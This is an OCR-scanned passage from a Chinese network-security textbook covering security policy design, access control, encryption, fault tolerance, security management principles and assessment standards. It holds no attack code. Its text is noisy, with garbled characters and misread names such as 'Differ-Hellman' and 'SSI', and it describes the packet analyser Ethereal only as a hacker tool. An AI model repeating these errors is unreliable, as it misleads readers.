入 侵 检 测 产品 ， 就 使 策略 的 实施 缺少 了 弹性 ， 因 为 技术 发 展 非常 之 快 ， 今 天 的 技术 不 可 能 
- 直 是 好 的 解决 方案 。 更 好 的 说 法 应 该 是 : “防止 未 授权 信息 进入 网 络 ”。 如 果 需 要 为 策 
略 提供 本 质 的 内 容 ， 再 用 详细 的 注释 把 该 策略 的 目的 和 意图 解释 给 具体 实现 策略 的 人 。 

制定 安全 策略 应 该 尽 可 能 简洁 一 些 ， 但 由 于 安全 策略 必须 覆盖 所 有 相关 的 主题 ， 它 又 
不 可 避免 地 较 长 。 作 为 折 中 的 办 法 ， 可 以 根据 安全 策略 针对 的 不 同 职责 范围 划分 层次 ， 如 
系统 管理 员 需 要 实施 的 安全 策略 、 数 据 库 管 理 员 需要 实施 的 安全 策略 、 安 全 管理 员 需 要 实 
施 的 安全 策略 、 普 通用 户 需要 实施 的 安全 策略 等 。 这 样 一 来 ， 用 户 就 可 以 直接 找 与 自己 相 
关 的 内 容 去 学 习 和 实施 安全 策略 。 另 外 ， 安 全 策略 必须 是 实际 环境 中 可 行 和 可 实现 的 。 应 
该 充分 考虑 了 员工 和 管理 人 员 的 意见 。 也 可 由 专门 的 安全 公司 来 制定 安全 策略 或 获得 咨询 
服务 ， 这 些 专业 的 安全 公司 有 助 于 更 好 、 更 全 面 地 理解 和 制定 安全 策略 。 制 定安 全 策略 的 
流程 如 图 10-1 所 示 。 


新 的 安全 问题 确定 关键 人 员 


管理 检查 工作 


最 终 策略 方案 


最 终 用 户 培训 


10-1 安全 策略 流程 图 
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10.3.2 ”安全 策略 内 容 


安全 策略 是 指 在 某 个 安全 区 域内 ， 所 有 与 安全 活动 相关 的 一 套 规则 。 如 果 把 构建 网 络 
安全 的 目标 比 作 一 座 大 厦 ， 那 么 相应 的 安全 策略 就 是 施工 的 蓝图 ， 它 使 网 络 建设 和 管理 过 
程 中 的 安全 工作 避免 了 盲目 性 。 

调查 显示 ， 目 前 55% 的 企业 网 没有 自己 的 安全 策略 ， 仅 靠 一 些 简单 的 安全 措施 来 保障 
网 络 安全 ， 这 些 安全 措施 可 能 存在 互相 分 立 、 互 相 了 矛盾 、 互 相 重复 、 各 自 为 战 等 问题 ， 既 
无 法 保障 网 络 的 安全 可 靠 ， 又 影响 网 络 的 服务 性 能 ， 并 且 随 着 网 络 运行 而 对 安全 措施 进行 
不 断 的 修补 ， 使 整个 安全 系统 愈加 腾 肿 不 堪 ， 难 以 使 用 和 维护 。 

网 络 安全 策略 包括 对 企业 的 各 种 网 络 服务 的 安全 层次 和 用 户 的 权限 进行 分 类 ， 确 定 管 
理 员 的 安全 职责 ， 如 何 实施 安全 故障 处 理 、 网 络 拓扑 结构 、 入 侵 及 攻击 的 防御 和 检测 、 备 
份 和 灾难 恢复 等 内 容 。 本 书 中 所 说 的 安全 策略 主要 指 系统 安全 策略 ， 主 要 涉及 四 大 方面 
物理 安全 策略 、 访 问 控制 策略 、 信 息 加 密 策略 和 安全 管理 策略 。 

1. 物理 安全 策略 


制定 物理 安全 策略 的 目的 是 : 保护 路 由 器 、 交 换 机 、 工 作 站 、 各 种 网 络 服务 器 、 打 印 
机 等 硬件 实体 和 通信 链 路 免 受 自然 灾害 、 人 为 破坏 和 搭 线 窃听 攻击 ; 验证 用 户 的 身份 和 使 
用 权限 、 防 止 用 户 越权 操作 ; 确保 网 络 设备 有 一 个 良好 的 电磁 兼容 工作 环境 ， 建 立 完备 的 
机 房 安全 管理 制度 ， 妥 善 保管 备份 磁带 和 文档 资料 ， 防 止 非法 人 员 进 入 机 房 进行 偷 窃 和 破 
坏 活动 。 

2. 访问 控制 策略 

访问 控制 是 网 络 安全 防范 和 保护 的 主要 策略 ， 它 的 主要 任务 是 保证 网 络 资源 不 被 非法 
使 用 和 访问 。 它 也 是 维护 网 络 系统 安全 、 保 护 网 络 资源 的 重要 手段 。 各 种 安全 策略 必须 相 
互 配 合 才能 真正 起 到 保护 作用 , 而 访问 控制 可 以 说 是 保证 网 络 安全 最 重要 的 核心 策略 之 一 。 
下 面 来 分 述 各 种 访问 控制 策略 。 

1) 入 网 访问 控制 

入 网 访问 控制 为 网 络 访问 提供 了 第 一 层 访 问 控制 。 它 控制 哪些 用 户 能 够 登录 到 服务 器 
并 获取 网 络 资源 ， 控 制 准许 用 户 入 网 的 时 间 和 准许 在 哪 台 工作 站 入 网 。 用 户 的 入 网 访问 控 
制 可 分 为 三 个 步骤 : 用 户 名 的 识别 与 验证 、 用 户口 令 的 识别 与 验证 、 用 户 帐号 的 默认 限制 
检查 。 三 道 关卡 中 只 要 任何 一 关 未 过 ， 该 用 户 便 不 能 进入 该 网 络 。 

对 网 络 用 户 的 用 户 名 和 口令 进行 验证 是 防止 非法 访问 的 第 一 道 防线 。 用 户 注册 时 首先 
输入 用 户 名 和 口令 ， 服 务 器 将 验证 所 输入 的 用 户 名 是 否 合法 。 如 果 验 证 合法 ， 才 继续 验证 
用 户 输入 的 口令 ， 否则， 用 户 将 被 拒 之 于 网 络 之 外 。 用 户 的 口令 是 用 户 入 网 的 关键 所 在 。 
为 保证 口令 的 安全 性 ， 用 户口 令 不 能 显示 在 显示 屏 上 ， 口 令 长 度 应 不 少 于 6 个 字符 ,口令 
最 好 是 数字 、 字 母 和 其 他 字符 的 混合 。 同 时 用 户口 令 必 须 经 过 加 密 ， 经 过 加 密 的 口令 ， 即 
使 是 系统 管理 员 也 难以 得 到 它 。 用 户 还 可 采用 一 次 性 口令 , 也 可 用 便携 式 验证 器 (如 智能 卡 ) 
来 验证 身份 。 

网 络 管理 员 应 该 可 以 控制 和 限制 普通 用 户 的 帐号 使 用 、 访 问 网 络 的 时 间 、 方 式 。 用 户 
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名 或 用 户 帐号 是 所 有 计算 机 系统 中 最 基本 的 安全 形式 ， 用 户 帐号 应 只 有 系统 管理 员 才 能 建 
立 。 用 户口 令 应 是 每 个 用 户 访问 网 络 所 必须 提交 的 “证 件 ”。 用 户 可 以 修改 自己 的 口令 ， 
同时 系统 管理 员 可 以 控制 口令 的 以 下 几 个 方面 : 最 小 口令 长 度 、 强 制 修改 口令 的 时 间 间 隔 、 
口令 的 唯一 性 、 口 令 过 期 失效 后 允许 入 网 的 宽 限 次 数 。 

用 户 名 和 口令 验证 有 效 之 后 ， 再 进一步 履行 用 户 帐 号 的 默认 限制 检查 。 网 络 应 能 控制 
用 户 登录 入 网 的 站 点 、 限 制 用 户 入 网 的 时 间 、 限 制 用 户 入 网 的 工作 站 数量 。 当 用 户 对 交 费 
网 络 的 访问 资费 用 尽 时 ， 网 络 还 应 能 对 用 户 的 帐号 加 以 限制 。 网 络 应 对 所 有 用 户 的 访问 进 
行 审计 。 如 果 多 次 输入 口令 不 正确 ， 则 认为 是 非法 用 户 的 入 侵 ， 应 给 出 报警 信息 。 

2) ”网 络 的 权限 控制 
网 络 的 权限 控制 是 针对 网 络 非法 操作 所 提出 的 一 种 安全 保护 措施 。 用 户 和 用 户 组 被 赋 
予 一 定 的 权限 。 网 络 控制 用 户 和 用 户 组 可 以 访问 哪些 目录 、 子 目录 、 文 件 和 其 他 资源 ， 指 
定 用 户 对 这 些 文件 、 目 录 、 设 备 能 够 执行 哪些 操作 。 根 据 访问 权限 将 用 户 分 为 以 下 几 类 ; 
特殊 用 户 ， 即 系统 管理 员 ， 一 般 用 户 ， 系 统管 理 员 根 据 他 们 的 实际 需要 为 他 们 分 配 操作 权 
限 ， 审计 用 户 ， 负 责 网 络 的 安全 控制 与 资源 使 用 情况 的 审计 。 用 户 对 网 络 资源 的 访问 权限 
可 以 用 一 个 访问 控制 表 来 描述 。 
3) “目录 级 安全 控制 
网 络 应 能 够 控制 用 户 对 目录 、 文 件 、 设 备 的 访问 。 用 户 在 目录 一 级 指定 的 权限 对 所 有 
文件 和 子 目录 有 效 ， 用 户 还 可 进一步 指定 对 目录 下 的 子 目录 和 文件 的 权限 。 对 目录 和 文件 
的 访问 权限 一 般 有 8 种 :系统 管理 员 权 限 (Supervisor)、 读 权限 (Read)、 写 权限 (Write)、 创 
建 权 限 (Create)、 删 除权 限 (Erase)、 修 改 权限 (Modify)、 文 件 查找 权限 (File Scan)、 存 取 控 制 
权限 (Access Control)。 一 个 网 络 系统 管理 员 应 当 为 用 户 指定 适当 的 访问 权限 ， 这 些 访问 权 
限 限制 着 用 户 对 服务 器 的 访问 。8 种 访问 权限 的 有 效 组 合 可 以 让 用 户 有 效 地 完成 工作 ， 同 
时 又 能 有 效 地 控制 用 户 对 服务 器 资源 的 访问 ， 从 而 加 强 了 网 络 和 服务 器 的 安全 性 。 

4) 属性 安全 控制 

当 用 文件 、 目 录 和 网 络 设备 时 ， 网 络 系统 管理 员 应 给 文件 、 目 录 等 指定 访问 属性 。 属 
性 安全 控制 可 以 将 给 定 的 属性 与 网 络 服务 器 的 文件 、 目 录 和 网 络 设备 联系 起 来 。 属 性 安全 
在 权限 安全 的 基础 上 提供 更 进一步 的 安全 性 。 网 络 上 的 资源 都 应 预先 标 出 一 组 安全 属性 。 
属性 往往 能 控制 以 下 几 个 方面 的 权限 : 向 某 个 文件 写 数据 、 复 制 一 个 文件 、 删 除 目录 或 文 
件 、 查 看 目录 和 文件 、 执 行文 件 、 隐 藏 文件 、 共 享 、 系 统 属性 等 。 网 络 的 属性 可 以 保护 重 
要 的 目录 和 文件 ， 防 止 用 户 对 目录 和 文件 的 删除 、 修 改 、 显 示 等 。 

5) 网络 服务 器 安全 控制 

网 络 允 许 在 服务 器 控制 台 上 执行 一 系列 操作 。 用 户 使 用 控制 台 可 以 执行 装载 和 印 载 模 
块 、 安 装 和 删除 软件 等 操作 。 网 络 服务 器 的 安全 控制 包括 : 可 以 设置 口令 锁定 服务 器 控制 
台 ， 以 防止 非法 用 户 修改 、 删 除 重要 信息 或 破坏 数据 ， 可 以 设 定 服务 器 登录 时 间 限 制 、 非 
法 访问 者 检测 和 关闭 的 时 间 间 隔 。 

6) ”网 络 监测 和 锁定 控制 

网 络 管理 员 应 对 网 络 实施 监控 ， 服 务 器 应 记录 用 户 对 网 络 资源 的 访问 ， 对 非法 的 网 络 
访问 ， 服 务 器 应 以 图 形 、 文 字 或 声音 等 形式 报警 ， 以 引起 网 络 管理 员 的 注意 。 如 果 不 法 之 
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徒 试图 进入 网 络 ， 网 络 服务 器 应 会 自动 记录 企图 尝试 进入 网 络 的 次 数 ， 如 果 非 法 访问 的 次 
数 达 到 设 定数 值 ， 那 么 该 帐户 将 被 自动 锁定 。 

7) 网 络 端口 和 节点 的 安全 控制 

网 络 服务 器 的 端口 往往 使 用 自动 回 呼 设备 、 静 默 调制 解 调 器 加 以 保护 ， 并 以 加 密 的 形 
式 来 识别 节点 的 身份 。 自 动 回 呼 设备 用 于 防止 假冒 合法 用 户 ， 静 默 调 制 解 调 器 用 以 防范 黑 
客 的 自动 拨号 程序 对 计算 机 进行 攻击 。 网 络 还 常 对 服务 器 端 和 用 户 端 采取 安全 控制 ， 用 户 
必须 携带 证 实 身份 的 验证 器 (如 智能 卡 、 磁 卡 、 安 全 密码 发 生 器 )。 在 对 用 户 的 身份 进行 验 
证 之 后 ， 才 允许 用 户 进入 用 户 端 。 然 后 ， 用 户 端 和 服务 器 端 再 进行 相互 验证 。 

8) 防火墙 控制 

防火 墙 是 一 种 保护 计算 机 网 络 安全 的 技术 性 措施 ， 它 是 一 个 用 以 阻止 网 络 中 的 黑客 访 
问 某 个 机 构 网 络 的 屏障 ， 也 可 称 之 为 控制 进 /出 方向 通信 的 门槛 。 在 网 络 边 界 上 通过 建立 起 
来 的 相应 网 络 通信 监控 系统 来 隔离 内 部 和 外 部 网 络 ， 以 阻止 外 部 网 络 的 侵入 。 


3. 信息 加 密 策略 


信息 加 密 的 目的 是 保护 网 内 的 数据 、 文 件 、 口 令 和 控制 信息 ， 保 护 网 络 会 话 的 完整 性 。 

网 络 加 密 可 以 在 链 路 级 、 网 络 级 、 应 用 级 等 进行 。 分 别 对 应 网 络 体系 结构 中 的 不 同 层 
次 形成 加 密 通信 通道 。 用 户 可 以 根据 不 同 的 需要 ， 选 择 适当 的 加 密 方式 。 

加 密 过 程 由 加 密 算法 来 具体 实施 。 据 不 完全 统计 ， 到 目前 为 止 ， 已 经 公开 发 表 的 各 种 
加 密 算法 多 达 数 百 种。 如 果 按 照 收发 双方 使 用 的 密 钥 是 否 相同 来 分 类 ， 可 以 将 这 些 加 密 算 
法 分 为 对 称 密码 算法 和 非 对 称 密码 算法 。 

在 对 称 密码 算法 中 ， 加 密 和 解密 使 用 相同 的 密 钥 。 比 较 著名 的 对 称 密码 算法 有 : 美国 
的 DES 及 其 各 种 变形 、 欧 洲 的 IDEA、RC4、RC5 以 及 以 代 换 密码 和 转 轮 密码 为 代表 的 古 
典 密码 等 。 对 称 密码 算法 的 优点 是 有 很 强 的 保密 强度 ， 且 经 得 住 时 间 的 检验 和 攻击 ， 但 其 
密 钥 必须 通过 安全 的 途径 传送 。 因 此 ， 其 密 钥 管理 成 为 系统 安全 的 重要 因素 。 

非 对 称 密码 算法 ( 即 公 钥 密码 算法 ) 中 ， 加 密 和 解密 使 用 的 密 钥 互 不 相同 ， 而 且 很 难 从 
加 密 密 钥 推导 出 解密 密 钥 。 比 较 著 名 的 公 钥 密 码 算法 有 : RSA、Differ-Hellman、LUC、Rabin 
等 , 其 中 最 有 影响 的 公 钥 密 码 算 法 是 RSA。 公 钥 密码 的 优点 是 可 以 适应 网 络 的 开放 性 要 求 ， 
且 用 密 钥 管理 问题 也 较为 简单 ， 可 方便 地 实现 数字 签名 和 验证 。 但 其 算法 复杂 ， 加 密 数据 
的 速率 较 低 。 

针对 两 种 密码 体系 的 特点 , 一 般 的 实际 应 用 系统 中 都 采用 两 类 密码 算法 进行 组 合 应 用 ， 
对 称 算法 加 密 长 消息 ， 非 对 称 算 法 加 密 短 消 息 。 比 如 用 对 称 算法 来 加 密 数 据 ， 用 非 对 称 算 
法 来 加 密 对 称 算法 所 使 用 的 密 钥 ， 这 样 既 解决 了 对 称 算法 密 钥 管理 的 问题 ， 又 解决 了 非 对 
称 算法 加 密 速度 的 问题 。 现 在 流行 的 PGP 和 SSI 等 加 密 技 术 就 是 将 对 称 密码 算法 和 公 钥 密 
码 结合 在 一 起 。 


10.4 建立 网 络 安全 体系 


通过 对 网 络 的 全 面 了 解 ， 按 照 安全 策略 的 要 求 、 风 险 分 析 的 结果 及 整个 网 络 的 安全 目 
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标 ， 设 计 和 建立 整个 网 络 的 安全 体系 。 具 体 的 安全 控制 系统 由 以 下 几 个 方面 组 成 : 物理 安 
全 、 网 络 安全 、 系 统 安全 、 信 息 安 全 、 应 用 安全 和 安全 管理 。 


10.4.1 物理 安全 


保证 计算 机 系统 各 种 设备 的 物理 安全 是 整个 计算 机 系统 安全 的 前 提 ， 物 理 安全 是 保护 
计算 机 网 络 设备 、 设 施 等 免 遭 地 震 、 水 灾 、 火 灾 等 事故 以 及 人 为 操作 失误 或 错误 和 各 种 计 
算 机 犯罪 行为 所 导致 的 破坏 过 程 。 它 主要 包括 三 个 方面 。 

(1) 环境 安全 : 对 系统 所 在 环境 的 安全 保护 ， 如 区 域 保护 和 灾难 保护 ， 对 此 国家 有 专 
门 的 安全 标准 ， 如 GB 50173 一 93《 电 子 计算 机 机 房 设 计 规范 》、GB 2887 一 89《 计 算 站 场 
地 技术 条 件 》、GB 9361 一 88《 计 算 站 场地 安全 要 求 》。 

(2) 设备 安全 : 主要 包括 设备 的 防盗 、 防 毁 、 防 电磁 信息 辐射 泄漏 、 防 止 线路 截获 、 
抗 电磁 干扰 及 电源 保护 等 。 

(3) 传输 介质 的 安全 : 包括 介质 数据 的 安全 及 介质 本 身 的 安全 。 


10.4.2 网络 安全 
在 网 络 的 安全 方面 ， 主 要 考虑 优化 网 络 结构 及 整个 网 络 系统 的 安全 。 
1. 网 络 结构 


安全 系统 是 建立 在 网 络 系统 之 上 的 ， 网 络 结构 的 安全 是 安全 系统 成 功 建立 的 基础 。 在 
整个 网 络 结构 的 安全 方面 ， 主 要 考虑 网 络 结构 、 系 统 和 路 由 的 优化 。 

2. 网 络 系统 安全 

(1) 访问 控制 及 内 外 网 的 隔离 。 访 问 控制 可 以 通过 如 下 几 个 方面 来 实现 : 制定 严格 的 
管理 制度 ， 如 用 户 授权 实施 细则 、 口 令 字 及 帐户 管理 规范 、 权 限 管理 制度 ， 配 备 相应 的 安 
全 设备 ， 如 在 内 部 网 与 外 部 网 之 间 设 置 防火 墙 实现 内 外 网 的 隔离 与 访问 控制 。 

(2) 内 部 网 不 同 网 络 安全 域 的 隔离 及 访问 控制 。 可 以 利用 VLAN(Virtual LAN) 技 术 来 
实现 对 内 部 子 网 的 物理 隔离 。 通 过 在 交换 机 上 划分 VLAN 可 以 将 整个 网 络 划分 为 儿 个 不 同 
的 广播 域 ， 实 现 内 部 不 同 网 段 的 物理 隔离 。 

(3) 网 络 安全 检测 。 网 络 系统 的 安全 性 取决 于 网 络 系统 中 最 薄弱 的 环节 。 那 如 何 及 时 
发 现 网 络 系统 中 最 薄弱 的 环节 并 最 大 限度 地 保证 网 络 系统 的 安全 呢 ? 最 有 效 的 方法 是 定期 
对 网 络 系统 进行 安全 性 分 析 ， 及 时 发 现 并 修正 存在 的 弱点 和 漏洞 。 

(4) 审计 与 监控 。 审 计 是 记录 用 户 使 用 计算 机 网 络 系统 进行 所 有 活动 的 过 程 ， 它 是 提 
高 安全 性 的 重要 工具 。 它 不 仅 能 够 识别 谁 访问 了 系统 ， 还 能 看 出 系统 正 被 怎样 使 用 。 

(5) 网 络 防 病毒 。 由 于 在 网 络 环境 下 ， 计 算 机 病毒 有 不 可 估量 的 威胁 性 和 破坏 力 ， 因 
此 ， 计 算 机 病毒 的 防范 是 网 络 安全 性 建设 中 重要 的 一 环 。 网 络 防 病毒 方面 应 建立 全 网 统一 
的 防 病毒 体系 ， 支 持 对 网 络 、 服 务 器 和 工作 站 的 实时 病毒 监控 ， 能 够 在 中 心 控制 台 向 多 个 
目标 分 发 新 版 杀毒 软件 ， 并 监视 多 个 目标 的 病毒 防治 情况 。 

(6) 网 络 备份 系统 。 使 用 备份 系统 能 够 恢复 运行 计算 机 系统 所 需 的 数据 和 系统 信息 。 
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备份 不 仅 在 网 络 系统 硬件 故障 或 人 为 失误 时 起 到 保护 作用 ， 也 在 入 侵 者 非 授 权 访问 或 对 网 
络 攻击 及 破坏 数据 完整 性 时 起 到 保护 作用 ， 同 时 也 是 系统 灾难 恢复 的 前 提 之 一 。 备 份 包括 
全 盘 备 份 、 增 量 备份 、 差 别 备份 、 按 需 备 份 和 排除 。 

(7) 系统 容错 与 网 络 见 余 。 人 性能、 价格 、 可 靠 性 是 评价 一 个 网 络 系统 的 三 个 要 素 。 为 
了 提高 可 靠 性 ， 人 们 总 结 了 两 种 方法 : 一 种 是 避 错 ， 即 试图 建造 一 个 不 包含 故障 的 系统 。 
要 绝对 做 到 这 一 点 ， 实 际 上 是 不 可 能 的 。 第 二 种 方法 叫 容错 ， 是 指 当 系统 出 现 某 些 硬件 或 
软件 错误 时 ， 系 统 仍 能 执行 规定 的 一 组 程序 ， 或 者 程序 不 会 因 系统 中 的 故障 而 中 断 或 被 修 
改 ， 并 且 执 行 结果 也 不 包含 系统 中 故障 所 引起 的 差错 。 

容错 系统 的 几 种 常用 的 实现 方法 如 下 。 

(D 空闲 设备 : 在 系统 中 配置 一 个 处 于 空闲 状态 的 备用 部 件 ， 当 原件 出 现 故障 时 ， 该 
设备 就 由 空闲 转 为 运行 ， 代 替 原 件 的 功能 。 

(2) 负载 平衡 采用 负载 平衡 这 种 容错 方法 的 系统 使 用 两 个 部 件 共同 承担 一 项 任务 
如 果 其 中 的 一 个 出 现 故 障 ， 另 一 个 则 担负 起 原来 两 个 部 件 的 任务 。 

(3) 镜像 : 由 两 个 部 件 执行 完全 相同 的 工作 ， 如 果 其 中 一 个 出 现 故障 ， 另 一 个 系统 继 
续 工作 。 

(4) 存储 元 余 : 存储 子 系统 是 网 络 系统 中 最 易 发 生 故障 的 部 分 。 通 过 磁盘 镜像 、 磁 盘 
双 联 以 及 RAID( 元 余 磁盘 阵列 ) 等 技术 ， 可 以 提高 存储 系统 的 容错 性 能 。 

(5) 网 络 见 余 : 是 指 在 网 络 系统 中 的 物理 线路 及 设备 的 元 余 ， 以 维持 物理 网 络 的 持续 
正常 运行 。 网 状 的 主干 网 拓扑 结构 、 双 核心 交换 机 、 宛 余 配 线 连 接 等 ， 都 可 以 保证 网 络 中 
没有 单 点 故障 。 


10.4.3 系统、 信息 和 应 用 安全 


系统 的 安全 主要 是 指 操作 系统 、 应 用 系统 的 安全 性 以 及 网 络 硬件 平台 的 可 靠 性 。 对 于 
操作 系统 的 安全 防范 可 以 采取 如 下 策略 : 对 操作 系统 进行 安全 配置 ， 提 高 系统 的 安全 性 ; 
系统 内 部 调用 不 对 Intemet 公开 ; 尽 可 能 采用 安全 性 高 的 操作 系统 ; 应 用 系统 在 开发 时 , 采 
用 规范 化 的 开发 过 程 ， 尽 可 能 地 减少 应 用 系统 的 漏洞 ， 网 络 上 的 服务 器 和 网 络 设备 尽 可 能 
不 采取 同一 家 的 产品 ， 通 过 专业 的 安全 工具 (安全 检测 系统 ) 定 期 对 网 络 进行 安全 评估 。 

信息 安全 包括 信息 存储 的 安全 及 传输 的 安全 。 存 储 的 安全 可 通过 上 述 访问 控制 、 数 据 

备份 等 措施 来 保障 。 对 于 传输 的 安全 性 ， 可 以 通过 加 密 及 签名 机 制 来 保障 。 
在 应 用 安全 上 ， 主 要 考虑 访问 的 授权 、 传 输 的 加 密 和 审计 记录 。 首 先 ， 必 须 加 强 登录 
过 程 的 认证 ， 确 保 用 户 的 合法 性 ; 其次， 应 该 严格 限制 登录 者 的 操作 权限 ， 将 其 完成 的 操 
作 限 制 在 最 小 的 范围 内 。 另 外 ， 在 加 强 主机 的 管理 上 ， 除 了 上 面谈 的 访问 控制 和 系统 漏洞 
检测 外 ， 还 可 以 采用 访问 存 取 控制 ， 对 权限 进行 分 割 和 管理 。 应 用 安全 平台 要 做 好 资源 目 
录 管 理 、 授 权 管 理 、 传 输 加 密 、 审 计 记 录 和 安全 管理 。 


10.5 安全 管理 实施 


为 了 保护 网 络 的 安全 性 ， 除 了 在 网 络 设计 上 增加 安全 服务 功能 、 完 善 系统 的 安全 保密 
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措施 外 ， 安 全 管理 规范 也 是 网 络 安全 所 必需 的 。 安 全 管理 策略 一 方面 从 纯粹 的 管理 上 即 安 
全 管理 规范 来 实现 ， 另 一 方面 从 技术 上 建立 高 效 的 管理 平台 (包括 网 络 管理 和 安全 管理 )。 
安全 管理 策略 主要 有 : 定义 完善 的 安全 管理 模型 ， 建 立 长 远 的 并 且 可 实施 的 安全 策略 ; 彻 
底 贯 彻 规范 的 安全 防范 措施 ， 建 立 恰当 的 安全 评估 尺度 ， 并 且 进行 经 常 性 的 规则 审核 。 当 
然 ， 还 需要 建立 高 效 的 管理 平台 。 


10.5.1 安全 管理 的 原则 


网 络 信息 系统 的 安全 管理 主要 基于 三 个 原则 。 

(1) 专人 负责 原则 。 每 一 项 与 安全 有 关 的 活动 ， 都 必须 有 两 人 或 多 人 在 场 。 这 些 人 应 
是 系统 主管 领导 指派 的 ， 他 们 忠诚 可 靠 ， 能 胜任 此 项 工作 ;他 们 应 该 签署 工作 情况 记录 以 
证 明 安全 工作 已 得 到 保障 。 特 别 是 在 以 下 各 项 与 安全 有 关 的 活动 中 ， 必 须 按 上 述 原则 来 指 
导 工件 。 这 些 活动 是 : 访问 控制 使 用 证 件 的 发 放 与 回收 ;信息 处 理 系统 使 用 媒介 的 发 放 与 
回收 ; 保密 信息 的 处 理 ， 硬 件 和 软件 的 维护 ， 系 统 软件 的 设计 、 实 现 和 修改 ， 重 要 程序 和 
数据 的 删除 和 销毁 等 。 

(2) 任期 有 限 原则 。 一 般 地 讲 ， 任 何人 最 好 不 要 长 期 担任 与 安全 有 关 的 职务 ， 以 免 使 
他 认为 这 个 职务 是 专 有 的 或 永久 性 的 。 为 遵循 任期 有 限 原 则 ， 工 作 人 员 应 不 定期 地 循环 任 
职 ， 强 制 实行 休假 制度 ， 并 规定 对 工作 人 员 进 行 轮流 培训 ， 以 使 任期 有 限制 度 切 实 可 行 。 

(3) 职责 分 离 原 则 。 在 信息 处 理 系统 工作 的 人 员 不 要 打听 、 了 解 或 参与 职责 以 外 的 任 
何 与 安全 有 关 的 事情 ， 除 非 系统 主管 领导 批准 。 出 于 对 安全 的 考虑 ， 下 面 每 组 内 的 两 项 信 
息 处 理工 作 应 当 分 开 : 计算 机 操作 与 计算 机 编程 ， 机 密 资 料 的 接收 与 传送 ， 安 全 管理 与 系 
统管 理 ， 应 用 程序 与 系统 程序 的 编制 ， 访 问 证 件 的 管理 与 其 他 工作 ;计算 机 操作 与 信息 处 
理 系 统 使 用 媒介 的 保管 等 。 


10.5.2 ”安全 管理 的 实现 


信息 安全 系统 的 安全 管理 部 门 应 根据 管理 原则 和 该 系统 处 理 数据 的 保密 性 ， 制 定 相应 
的 管理 制度 。 有 具体 工作 如 下 。 

(1) 根据 工作 的 重要 程度 ， 确 定 该 系统 的 安全 等 级 。 

(2) 根据 确定 的 安全 等 级 ， 确 定安 全 管理 的 范围 。 

(3) 制定 相应 的 机 房 出 入 管理 制度 。 

(4) 制定 严格 的 操作 规程 。 

(5) 制定 完备 的 系统 维护 制度 。 

(6) 制定 应 急 措施 。 

对 于 安全 等 级 要 求 较 高 的 系统 , 要 实行 分 区 控制 , 限制 工作 人 员 出 入 与 己 无 关 的 区 域 。 
出 入 管理 可 采用 证 件 识别 或 安装 自动 识别 登记 系统 ， 采 用 磁卡 、 身 份 卡 等 手段 ， 对 人 员 进 
行 识 别 、 登 记 管理 。 对 于 操作 规程 要 根据 职责 分 离 和 多 人 负责 的 原则 ， 各 负 其 责 ， 不 能 超 
越 自己 的 管辖 范围 。 对 系统 进行 维护 时 ， 应 采取 数据 保护 措施 ， 如 数据 备份 等 。 维 护 时 要 
首先 经 主管 部 门 批准 ， 并 有 安全 管理 人 员 在 场 ， 故 障 的 原因 、 维 护 内 容 和 维护 前 后 的 情况 
要 详细 记录 。 要 制定 系统 在 紧急 情况 下 如 何 尽快 恢复 的 应 急 措 施 ， 使 损失 减 至 最 小 。 建 立 
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人 员 雇用 和 解聘 制度 ， 对 工作 调动 和 离职 人 员 要 及 时 调整 相应 的 授权 。 
10.6 安全 性 测试 及 评估 


10.6.1 网 络 安全 测试 


系统 安全 问题 的 发 现 有 两 种 途径 : 一 是 实际 发 生 了 非法 操作 和 攻击 行为 ， 据 此 来 查找 
系统 的 安全 漏洞 ， 另 一 个 途径 则 是 自己 进行 系统 安全 漏洞 的 审查 。 而 后 者 在 网 络 的 安全 管 
理 中 是 一 个 非常 重要 的 手段 ， 这 种 主动 降低 网 络 安全 风险 的 做 法 意义 重大 。 

进行 网 络 安全 性 测试 可 以 采用 的 方法 包括 : 使 用 扫描 工具 检测 系统 漏洞 、 在 网 络 中 设 
置 “ 密 饶 ”。 

目前 在 网 络 上 黑客 工具 随处 可 见 ， 这 些 工具 针对 网 络 上 的 安全 弱点 进行 自动 的 扫描 分 
析 或 监听 ,危害 极 大 。 例 如 ，Ethereal 软件 是 互联 网 上 众多 黑客 软件 中 的 一 种 ， 其 主要 手段 
是 通过 侦 听 线路 数据 通讯 ， 窃 取 和 破解 数据 信息 ， 并 从 中 筛选 、 分 析出 用 户 的 帐号 或 密码 
等 重要 数据 ， 伺 机 冒充 合法 客户 进入 系统 以 达到 其 目的 。 对 此 类 软件 ， 需 要 有 相应 的 应 对 
策略 进行 防范 ， 如 关闭 一 切 不 必要 的 端口 、 对 此 类 程序 经 常 利 用 的 操作 系统 或 应 用 软件 的 
漏洞 及 早 打 补丁 等 。 


10.6.2 网络 安全 的 评估 


安全 对 象 及 安全 问题 的 复杂 性 决定 了 网 络 安全 工程 的 复杂 性 、 持 续 性 、 反 复 性 。 在 此 
过 程 中 ， 网 络 安全 评估 是 一 个 重要 的 步骤 ， 通 过 网 络 安全 评估 ， 对 企业 网 络 安全 状况 有 一 
个 整体 的 了 解 。 

评估 一 个 网 络 的 安全 情况 ， 不 仅仅 是 物理 防范 措施 等 技术 方面 的 问题 ， 还 需要 综合 考 
虑 人 员 、 环 境 等 其 他 的 非 技术 因素 。 


10.7 ”信息 安全 管理 标准 


10.7.1 国际 信息 安全 管理 标准 


随 着 在 世界 范围 内 信息 化 水 平 的 不 断 发 展 和 贸易 全 球 一 体 化 的 不 断 普 及 和 深入 ， 信 息 
系统 在 政府 、 机 构 和 商业 企业 中 得 到 了 真正 的 广泛 的 应 用 。 许 多 组 织 对 其 信息 系统 的 依赖 
性 不 断 增 长 ， 加 上 在 信息 系统 上 运作 的 业务 的 风险 、 收 益 和 机 会 不 断 增加 ， 使 得 信息 安全 
管理 成 为 组 织 管理 越 来 越 关键 的 一 部 分 。 在 很 多 的 场合 ， 保 护 信 息 安 全 ， 建 立信 息 安 全 管 
理 体系 是 政府 、 机 构 或 企业 营运 的 重要 工作 之 一 。 

信息 安全 威胁 日 益 紧 迫 ， 这 是 世界 大 环境 和 学 术 界 共同 认同 的 原则 ， 在 这 样 的 原则 下 
各 国 的 研究 机 构 都 纷纷 研究 和 制定 信息 安全 管理 、 风 险 评 估 、 信 息 安全 技术 的 标准 ， 而 英 
国标 准 化 协会 BSD， 是 全 世界 标准 界 负 有 盛名 的 机 构 ， 在 成 功 地 颁布 了 ISO 9000、ISO 
14000、OHSAS 18000 等 世界 著名 的 标准 后 ， 又 率先 制定 了 信息 安全 管理 标准 BS 7799。 
